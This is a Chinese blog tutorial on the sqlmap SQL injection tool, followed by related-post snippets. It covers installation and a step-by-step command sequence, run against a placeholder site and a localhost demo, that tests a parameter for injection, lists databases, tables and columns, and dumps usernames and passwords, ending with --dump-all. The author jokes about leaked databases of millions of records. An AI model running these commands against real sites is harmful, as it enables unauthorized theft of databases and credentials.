2. 程式人生 > >SQL注入神器-sqlmap

SQL注入神器-sqlmap

阿新 發佈:2019-02-10
 正是SQLMAP這種神器的存在,SQL注入簡直Easy到根本停不下來....

    PS:國內類似軟體也有阿D,明小子,挖掘機,當你用過他們之後你才會發現SQLMap才是絕對的注入神器

0x 01 注入原理

*****************************************開始分割線*****************************************

    時間原因,這段內容就先不寫了

    就是因為太重要了所以要整理好在寫上哈

    雖然事實上是我現在還沒搞太明白我會亂說 :)

*****************************************結束分割線*****************************************

0x 02 安裝SQLMap

  1. 安裝python 

    官網https://www.python.org/ 選擇最新版本下載安裝即可

    因為SQLMap使用Python寫的 ,所以沒有Python的環境SQLMap無法執行

  2. 安裝SQLMap

    官網 http://sqlmap.org/ 選擇最近版本安裝即可

  3. 設定環境變數

    為了使用便利,將SQLMAP的安裝目錄新增到系統環境變數中

    之後在CMD中就可以直接使用SQLMap了

    不設定環境變數的話,要把CMD的當前目錄切換到SQLMap安裝目錄才可以使用

0x 03 SQLMap常用命令介紹

  1. sqlmap.py -u "http://www.XXX.com/index.asp?id=1" 

  

    判斷id引數是否存在注入:結果中包含 “id” is Vulnerable  欄位表示存在注入

    存在注入,下面的步驟才可以執行成功~

  2. sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --dbs

    列舉能列出的所有資料庫名

  3.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" --current-db

    列出當前使用的資料庫名,假設列出“sqltest”資料庫  

  4.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1"  --is-dba

    判斷該注入點是否有管理員許可權:返回true  表示是管理員

  5.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" --tables

    獲取sqltest中的所有表,假設有"admin"表

  6.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" --columns

    列舉表admin的欄位(列名),假設存在"username","password"欄位

  7.  sqlmap.py -u "http://www.XXX.com/index.asp?id=1" -D "sqltest" -T "admin" -C "username,password" --dump

    下載欄位username,password的值,若詢問是否破解md5加密,選擇no即可

    至此,對一個簡單的注入點(GET方式),現在就已經得到了我們想要的資料

    想看工具的注入過程 使用-v引數

    -level 會提高注入等級(預設0 只會判斷get,post引數是否有注入點)

    若注入點是POST方式,或是注入點才Cookie,User-Agent中,可以利用-Date 引數 -Cookie引數指定

    當然用buip Suite架個代理,擷取資料包,直接 -r 引數引入資料包也可以完成上述的注入情況的~

0x 04 注入Demo

    本次演示使用Apache+Php +Mysql 環境,其他環境的話

    使用SQLMap輸入還是相同的命令,這點SQLMap做的好方便

       

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --dbs 列所有資料庫名

     

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --current-db 列出當前資料庫

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" --is-dba   判斷注入點是否有管理員許可權

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --tables  猜表名

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" --columns  猜欄位名

    

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" -T "test" -C "id,name" --dump 猜id和name的值

    

    網路上流傳的脫褲 用的可就是下面的一句話

    sqlmap.py -u "http://127.0.0.1/sqlinject.php?id=1" -D "test" --dump-all

    突然發現 強大的東西往往僅僅是一句話 ! !

    這條命令會直接把test資料庫中所有的表全部下載到安裝目錄output資料夾中

    然後就有了  2000W  xxx 800W xxx ....................你懂得

相關推薦

SQL注入神器-sqlmap

 正是SQLMAP這種神器的存在,SQL注入簡直Easy到根本停不下來....     PS:國內類似軟體也有阿D,明小子,挖掘機,當你用過他們之後你才會發現SQLMap才是絕對的注入神器 0x 01 注入原理 ******************************

sql注入sqlmap的使用

一.sql注入產生的原因 sql注入用一句概況就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的SQL命令。 通過控制部分SQL語句,攻擊者可以查詢資料庫中任何自己需要的資料,利用資料庫的一些特性,可以直接獲取資料庫伺服器的系統許可權。 要利用sql注入必

搭建DVWA測試環境和SQL注入SQLmap入門

DVWA是一款滲透測試的演練系統,在圈子裡是很出名的。如果你需要入門,並且找不到合適的靶機,那我就推薦你用

SQL注入sqlmap爆破sqli-labs-master

sqlmap是一款爆破mysql資料的神器。這裡我用sqlmap來演示爆破sqli-labs-master的資料庫。 GET型的sqlmap爆破。 1.列舉資料庫:Python sqlmay.py -u http://localhost/sqli-labs-master/L

SQL註入神器——sqlmap

sql註入 sqlmap 滲透測試中,SQL註入是一種很常見的高危漏洞,但是如果我們僅僅靠手工註入的話,那麽效率是十分低下的,並且有時有些語句還記不住,而sqlmap就是一款專門針對SQL註入的自動化工具! 下載地址:http://sqlmap.org/ 雖然sqlmap是針對S

[實戰]使用SQLmap進行SQL注入

一、什麼是SQLmap? SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(資料庫指紋、訪問底層檔案系統、執行命令)。 備註:SQLmap是python程式碼 二、SQL注入

【Pyhon】利用BurpSuite到SQLMap批量測試SQL注入

前言 通過Python指令碼把Burp的HTTP請求提取出來交給SQLMap批量測試,提升找大入口網站SQL注入點的效率。 匯出Burp的請求包 配置到Burp的代理後瀏覽門戶站點,Burp會將URL紀錄儲存在HTTP History選項卡的內容裡 匯出Burp的請求包到SQLMAP中測試SQL注

SqlMap自動化SQL注入測試工具簡紹

Sqlmap是一個開源的滲透測試工具,可以自動檢測和利用SQL注入漏洞並接管資料庫伺服器。它配備了強大的檢測引擎,為終極滲透測試儀提供了許多小眾功能,以及從資料庫指紋識別,從資料庫獲取資料到訪問底層檔案系統以及在作業系統上執行各種命令。 演示: # 使用SqlMap在特定目標URL上進行SQ

sqlmap查詢SQL注入漏洞入門

sqlmap查詢SQL注入漏洞入門 1、安裝sqlmap sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。注意:sqlmap只是用來檢測和利用sql注入點的,使用前請先使用掃描工具掃出sql注入點。 它由python語言開發而成,因此執行需要安

2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法,使用SQLMAP、任意抓包工具)

首先進入DVWA,調整安全級別為low。 開啟SQL Injection頁面,ID欄輸入1 因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。 將抓包內容儲存至本地(/root/test) 開啟終端,輸入: sqlmap

初使用sqlmap對dvwa進行sql注入

1.下載安裝dvwa,可以去此處下載:http://www.dvwa.co.uk/ 2.需要安裝python執行環境,我使用的是python2.7,python2.7-3.0之間的應該都可以。 3.下載sqlmap包並將其解壓 4.直接cmd執行sqlmap,輸入sqlmap.py -h檢視幫助資訊

kali學習筆記——實戰sqlmap入侵某網站(存在sql注入漏洞)

前言 直接上實戰,原理在下面會簡單介紹,有需要詳細教程的到這裡下載: https://download.csdn.net/download/u013819875/10503430 首先宣告我也只是一個網路愛好者,菜鳥水平(不過php,sql都是學過,有一些基礎的),寫這篇文章權當學

sql注入工具:sqlmap命令

  sqlmap是一款專業的sql注入工具, 讓你告別人工注入, 程式高效自動注入   前提是你有找到注入點 , 工具的官方網站:http://sqlmap.org/   kali系統預設安裝sqlmap, 不需要額外安裝:   sqlmap的命令列幫助: ___

暑期練習web18:簡單的sql注入1,2(實驗吧)手工注入sqlmap

目前只會做1和2。。3的話網上查了wp不知道他們sqlmap沒防任何過濾咱們跑出來的。。。等來年長了本事了,一定要自己手工做出來 注入1的話呢,在輸入1’ or ‘1’=’1的時候就發現存在過濾,後來發現是空格被過濾了,所以我們用註釋符/*來替換空格,注入1的

Burpsuite與sqlmap結合進行sql注入滲透測試

SQL注入漏洞測試網站:http://testasp.vulnweb.com/ 2.分別配置burpsuite的代理和火狐瀏覽器的代理伺服器: 設定burp的proxy--Intercept為Intercept on即擷取資料模式,然後在漏洞測試網站的登入頁面填入使

使用sqlmap工具測試網站安全性(sql注入等)

sqlmap工具的正常使用依賴python,所以要先安裝python。 python下載地址:https://www.python.org/(下載2.7版本的) sqlmap下載地址:http://sqlmap.org/ 這兩個安裝好之後,把路徑寫入環境變數,便於使用。 1

SQL注入攻擊之SQLMap滲透測試

準備工具:Python2.7.9、SQLMap、FireFox外掛Tamper Data SQLMap進行滲透測試 FireFox外掛Tamper Data用於獲取Post引數資料和Cookie值 示例: SQLMap POST方法:sqlmap.py -u "http:/

安全攻防之SQL注入(通過sqlmap搞定所有問題)

第一步: sqlmap基於Python,所以首先下載: http://yunpan.cn/QiCBLZtGGTa7U  訪問密碼 c26e 第二步: 安裝Python,將sqlmap解壓到Python根目錄下; 第三步: 小試牛刀,檢視sqlmap版本: python sqlmap/sqlmap.py -

SQL注入--sqlmap自動化注入工具

小編使用的是kali2.0的系統,自帶sqlmap1.0版本 相對於手工注入,自動化工具更加快捷不用反覆寫入SQL語句,但是不如手工注入的靈活性好,二者各有千秋,在適合的時候使用適合的方法才能擁有最高的工作效率 簡單的使用過程如下 後邊我會把最新版的sqlmap下載地址放出

一次對真實網站的SQL註入———SQLmap使用

md5 password blog 發生 為我 www mysql 賬戶 9.png 網上有許多手工註入SQL的例子和語句,非常值得我們學習,手工註入能讓我們更加理解網站和數據庫的關系,也能明白為什麽利用註入語句能發現網站漏洞。 因為我是新手,註入語句還不太熟悉,我這次是手